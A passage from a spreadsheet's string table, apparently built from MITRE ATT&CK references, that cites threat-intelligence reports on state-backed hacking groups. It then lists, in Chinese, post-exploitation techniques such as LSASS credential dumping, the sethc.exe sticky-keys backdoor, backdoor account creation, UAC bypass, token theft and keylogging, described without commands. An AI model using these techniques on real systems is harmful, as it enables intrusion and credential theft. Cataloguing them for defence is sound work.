    <t>Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R., Wilhoit, K.. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Singh, S., Yin, H. (2016, May 22). https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html. Retrieved April 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.</t>
  </si>
  <si>
    <t>Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.</t>
  </si>
  <si>
    <t>Carr, N.. (2018, October 25). Nick Carr Status Update. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.</t>
  </si>
  <si>
    <t>Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.</t>
  </si>
  <si>
    <t>Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020</t>
  </si>
  <si>
    <t>Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>ESET Research. (2019, April 30). Buhtrap backdoor and Buran ransomware distributed via major advertising platform. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.</t>
  </si>
  <si>
    <t>Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”. Retrieved June 18, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Global Research and Analysis Team . (2018, April 12). APT Trends report Q1 201Retrieved January 27, 2021.</t>
  </si>
  <si>
    <t>Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.</t>
  </si>
  <si>
    <t>Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.</t>
  </si>
  <si>
    <t>Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-1Retrieved January 29, 2021.</t>
  </si>
  <si>
    <t>Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.</t>
  </si>
  <si>
    <t>Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>DOJ. (2018, March 23). U.S. v. Rafatnejad et al . Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Hassold, Crane. (2018, March 26). Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2018, August 24). Back to School: COBALT DICKENS Targets Universities. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, September 11). COBALT DICKENS Goes Back to School…Again. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.</t>
  </si>
  <si>
    <t>Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&amp;CK Mapping. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.</t>
  </si>
  <si>
    <t>Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.</t>
  </si>
  <si>
    <t>Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.</t>
  </si>
  <si>
    <t>Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020.</t>
  </si>
  <si>
    <t>Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.</t>
  </si>
  <si>
    <t>ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.</t>
  </si>
  <si>
    <t>Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.</t>
  </si>
  <si>
    <t>Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Insikt Group. (2020, March 12). Swallowing the Snake’s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rapid(2013, November 26). meterpreter/source/extensions/priv/server/elevate/. Retrieved July 8, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., Léveillé, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo – the vivisection of a large Linux server‑side credential‑stealing malware campaign. Retrieved February 10, 2021.</t>
  </si>
  <si>
    <t>CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021.</t>
  </si>
  <si>
    <t>Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.</t>
  </si>
  <si>
    <t>The BlackBerry Research &amp; Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.</t>
  </si>
  <si>
    <t>Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.</t>
  </si>
  <si>
    <t>S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.</t>
  </si>
  <si>
    <t>John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&amp;CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.</t>
  </si>
  <si>
    <t>Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Huntley, S. (2020, October 16). How We're Tackling Evolving Online Threats. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Amazon. (n.d.). Amazon SRetrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Russinovich, R. &amp; Garnier, T. (2021, August 18). Sysmon Event ID Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Google. (n.d.). Virtual machine instances. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>kubenetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Android, iOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。</t>
  </si>
  <si>
    <t>Linux</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., Léveillé, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo – the vivisection of a large Linux server‑side credential‑stealing malware campaign. Retrieved February 10, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>출처</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>: https://blog.alyac.co.kr/2243 [</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>이스트시큐리티</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>알약</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>블로그</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>]. Retrieved September 29, 2021.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Platforms</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>: Linux, Windows, macOS</t>
    </r>
  </si>
  <si>
    <t>描述</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>实施</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>从LSASS转储凭据</t>
  </si>
  <si>
    <t>从SAM Hive文件中转储哈希</t>
  </si>
  <si>
    <t>检查终端服务</t>
  </si>
  <si>
    <t>从sethc.exe文件到cmd.exe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>替换真正的sethc.exe与cmd.exe的副本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>获取网络信息</t>
  </si>
  <si>
    <t>获取ARP表</t>
  </si>
  <si>
    <t>转储MAC、IP地址和代码</t>
  </si>
  <si>
    <t>获取域计算机的列表</t>
  </si>
  <si>
    <t>显示与域控制器的信任关系</t>
  </si>
  <si>
    <t>显示登录服务器</t>
  </si>
  <si>
    <t>获取用户信息</t>
  </si>
  <si>
    <t>检查常见的权限提升方法</t>
  </si>
  <si>
    <t>远程创建新服务</t>
  </si>
  <si>
    <t>获取当前的TCP/IP连接</t>
  </si>
  <si>
    <t>显示活动SMB会话</t>
  </si>
  <si>
    <t>显示所有当前计划的任务</t>
  </si>
  <si>
    <t>创建计划任务</t>
  </si>
  <si>
    <t>启动键盘记录器</t>
  </si>
  <si>
    <t>枚举正在运行的进程</t>
  </si>
  <si>
    <t>提升到系统级流程</t>
  </si>
  <si>
    <t>枚举本地管理员帐户</t>
  </si>
  <si>
    <t>获取域管理员帐户</t>
  </si>
  <si>
    <t>启用RDP服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>获得可用共享</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>获取Windows版本</t>
  </si>
  <si>
    <t>从web浏览器收集密码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打印环境变量</t>
  </si>
  <si>
    <t>获取计算机信息</t>
  </si>
  <si>
    <t>获取配置信息</t>
  </si>
  <si>
    <t>收集有关目标用户的更多信息</t>
  </si>
  <si>
    <t>查询Active Directory中的用户、组和权限</t>
  </si>
  <si>
    <t>旁路UAC</t>
  </si>
  <si>
    <t>Token窃取</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>转储网络共享资源信息</t>
  </si>
  <si>
    <t>工作站和网络设备列表</t>
  </si>
  <si>
    <t>创建后门用户帐户</t>
  </si>
  <si>
    <t>启用“support_388945a0”帐户</t>
  </si>
  <si>
    <t>获取域控制器列表</t>
  </si>
  <si>
    <t>“这项技术将注入LSASS.exe进程，并在其内存中搜寻已登录用户的明文密码。您必须从高完整性进程中执行此操作。</t>
  </si>
  <si>
    <t>从SAM Hive文件中转储哈希。</t>
  </si>
  <si>
    <t>检查终端服务的当前注册表值，如果为0，则启用终端服务。如果是1，那么他们是不可用的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>修改注册表以指向sethc。exe文件指向cmd。exe</t>
  </si>
  <si>
    <t>移除真正的sethc。并用cmd的副本替换它。exe。也可以只移动原始sethc。如果不想删除，请将exe复制到其他文件</t>
  </si>
  <si>
    <t>获取有关域、网络适配器、DNS/WSUS服务器的信息</t>
  </si>
  <si>
    <t>显示ARP表</t>
  </si>
  <si>
    <t>用于获取机器的MAC和IP地址以及一些描述性代码（0x1C表示域控制器）</t>
  </si>
  <si>
    <t>通过显示域中的计算机帐户（COMP_NAME$）来显示域中的域计算机列表</t>
  </si>
  <si>
    <t>显示工作站和域之间的信任关系-必须提升才能使用此功能！</t>
  </si>
  <si>
    <t>显示工作站的active directory登录服务器</t>
  </si>
  <si>
    <t>获取当前用户信息、SID、域、用户所属的组、用户的安全权限</t>
  </si>
  <si>
    <t>权限提升。ps1是PowershellMafia在github上的PowerSploit项目中的powershell脚本。Invoke-AllChecks命令检查许多常见的权限提升选项，如无引号的服务路径、可写服务目录、服务信息操作、始终安装提升等。每种特定的提升技术都提供了自己的滥用方法。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示当前的TCP/IP网络连接（b需要提升权限，以便查看打开连接的进程）</t>
  </si>
  <si>
    <t>显示工作站上活动SMB会话的列表，以便查看哪些用户具有活动连接。</t>
  </si>
  <si>
    <t>“这项技术在远程计算机上创建了一个新服务。在这些命令中，注意=后面的空格非常重要！此外，在启动服务之前，运行以下命令以确保所有设置都正确。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示要在计算机上运行的所有当前计划任务</t>
  </si>
  <si>
